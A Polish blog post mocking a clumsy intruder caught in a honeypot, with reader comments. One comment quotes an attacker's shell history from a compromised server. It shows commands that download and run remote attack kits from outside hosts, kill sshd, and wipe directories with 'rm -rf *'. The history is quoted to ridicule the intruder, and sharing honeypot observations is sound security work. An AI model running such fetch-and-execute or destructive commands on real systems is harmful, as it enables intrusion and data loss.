01 lutego 2011

Najgorszy haker wszech czasów?

wtorek, lutego 01, 2011 | Autor: \m/ojtek
W miarę obiektywne wskazanie najlepszego hakera wszech czasów jest z pewnością nie lada wyzwaniem. W przeciwieństwie do ikon hack-kultury, prawdopodobnie osoba taka nie jest nawet w ogóle publicznie znana. Za to dość łatwo możemy nawet osobiście zbierać kandydatury do miana najgorszego hakera wszech czasów. Wystarczy tylko przygotować własny honeypot. Poza tym, podglądanie domorosłych włamywaczy penetrujących nasz system – przynętę, może być naprawdę zabawne. Z resztą sami zobaczcie!

Oto zapis starań pewnego włamywacza walczącego zaciekle z niegościnnym systemem – przynętą.


Prawda, że honeypot może być źródłem świetnej zabawy? Wszystko mogę zrozumieć, ale po co mu (jej?) ten W2Ksp3.exe?

Etykiety: , ,

Komentarze (24)

Wczytywanie... Logowanie...
Panel | Edytuj profil | Wyloguj się
  • Zalogowany jako
+2 Głosuj na tak Głosuj na nie
Awatar foxpl

foxpl · 738 tygodni temu

imo sciema, jak ktos umie sie w konsoli poruszac chociaz z grubsza (wie co to tar, apt-get, wget) to i potrafi rozkminic dlaczego mu perl nie smiga... i zamiast wpisywac 'cd katalog_ktory_nie_istnieje' wpisuje najpierw 'ls' a nie probuje na oslep...
3 odpowiedzi · aktywny 738 tygodni temu
+1 Głosuj na tak Głosuj na nie
Awatar would

would · 738 tygodni temu

pewnie masz rację, ale przynajmniej dobrą piosenkę wybrali. Kto grał w Portal ten ma z nią związanie świetne wspomnienia;]
-3 Głosuj na tak Głosuj na nie
Awatar lolek

lolek · 738 tygodni temu

Jakby to była prawda to by wyglądało mniej więcej tak:
~# cd /var/spool/samba/s
No such file or directory
~# cd /var/spool/samb
No such file or directory
~# cd /var/spool
No such file or directory
~# mc

Wiem coś o tym... :P
0 Głosuj na tak Głosuj na nie
Awatar Sebastian

Sebastian · 738 tygodni temu

Tutaj "hackerowi" chodzi o to że jeżeli nie masz praw do odczytu katalogu to 'ls' nic Tobie nie pokaże i tylko klepanie na ślepo pozwoli wejść dalej (wydaje mi się że o to mu chodziło). Niestety on miał prawo do odczytu ;)
+2 Głosuj na tak Głosuj na nie
Awatar Marcin

Marcin · 738 tygodni temu

Test szybkości łącza ;) M$ ma jedne z najlepszych CDM.
+2 Głosuj na tak Głosuj na nie
Awatar gvs

gvs · 738 tygodni temu

Nie udało się bo nie próbował emacsem przez sendmaila ;)

Wbrew pozorom nieumiejętne wystawienie honeypota może być źródłem zagrożenia jeśli ktoś wykorzysta go do np dosowania trzeciej maszyny, hopa przy jakimś innym ataku itp. Często wystawiając przynętę zapominamy, że nawet jeśli nie ma na niej nic co by mogło interesować intruza, to sam dostęp do maszyny jest już potencjalnym niebezpieczeństwem. Oddzielna domena bezpieczeństwa, unikanie wirtualizacji i zestawy IDS'ów często są niewystarczającymi środkami.
5 odpowiedzi · aktywny 738 tygodni temu
Wczytywanie...
+2 Głosuj na tak Głosuj na nie
\m/ojtek's avatar - Go to profile

\m/ojtek 84p · 738 tygodni temu

Zgadza się, a policja zapuka do nas...
0 Głosuj na tak Głosuj na nie
Awatar MtS

MtS · 738 tygodni temu

Miałem podobna przygodę - history:
643 pkill -9 -t pts/2
644 pkill -9 -t pts/3
645 w
646 w
647 pkill -9 -t pts/2
648 ls
649 w
650 cd /var/tmp/
651 ls
652 cd gosh
653 ls
654 nano go.sh
655 ./go.sh
656 w
657 ls
658 wget
659 passwd
660 wget http://download.microsoft.com/download/win2000pla...
661 cd /var/tmp/
662 ls
663 cd /dev/shm/
664 ls
665 ls -a
666 cat /proc/cpuinfo
667 cd
668 ls
669 rm -rf *
670 ls
671 w
672 cd /var/tmp/
673 ls
674 rm -rf *
675 wget http://LinuxSyS.webs.com/gosh.tgz
676 ls
677 tar xzvf gosh.tgz
678 cd gosh
679 chmod +x *
680 ls
681 ./go.sh 210
682 ./go.sh 211
683 netstat -a
684 kill sshd
685 pid -a
686 p
687 ps
688 ps -aq
689 ps -a
690 kill 5042
691 ps -a
692 ps -a
693 ps -5063
694 kill 5063
695 kill 5109
696 kill 5117
697 kill 5125
698 kill 5126
699 ls
700 ps -a
701 cd /var/tmp/
702 w
703 ls
704 rm -rf *
705 ls
706 wget http://rohacker.ucoz.ru/newSCAN.tar
707 tar xzvf newSCAN.tar
708 rm -rf newSCAN.tar
709 cd newSCAN
710 chmod +x *
711 ls
712 cat vuln.txt
713 ls
714 ./a 115.62
715 /etc/init.d sshd stop
716 /etc/init.d/sshd stop
717 who
718 whoami
719 pi ng -a 87.221.189.0
720 ping -a 87.221.189.0
721 tracert 87.221.189.0
722 traceroute 87.221.189.0
723 whoami
724 who
725 lohout root pts/3
726 logout root pts/3
727 ps -a
728 ps -A
729 kill 4869
730 ps -A
731 kill
732 kill -l
733 kill pid
734 kill pid 4869
735 kill 4869
736 ps -A
737 w
738 cd alert/
739 history
740 cd newSCAN
741 cat /var/spool/mail/root
742 ls
743 ls
744 ssh
745 netsta -l
746 netstat -l
747 ls
748 history
749 cd newSCAN
750 whereis newSCAN
751 find newSCAN
752 ./go.sh
753 ls
754 cd /
755 ls
756 cd root
757 ls
758 ls
759 history
1 odpowiedź · aktywny 738 tygodni temu
Wczytywanie...
+3 Głosuj na tak Głosuj na nie
\m/ojtek's avatar - Go to profile

\m/ojtek 84p · 738 tygodni temu

" chmod +x * " zawsze wszystko naprawi :).
Wczytywanie...
+1 Głosuj na tak Głosuj na nie
r9s's avatar - Go to profile

r9s 11p · 738 tygodni temu

Wrzuci ktos filmik na YT bo nie mam flasha w komorce? :)
0 Głosuj na tak Głosuj na nie
Awatar lukspa

lukspa · 703 tygodni temu

Nice;)
0 Głosuj na tak Głosuj na nie
Awatar Urzęd Skarbowy

Urzęd Skarbowy · 693 tygodni temu

Hah, pewnie przez wine emuluje tego service packa ;)

Wyślij nowy komentarz

Comments by

Subskrybuj: Komentarze do posta (Atom)

Blogger Template created with Artisteer by Wojciech Smol.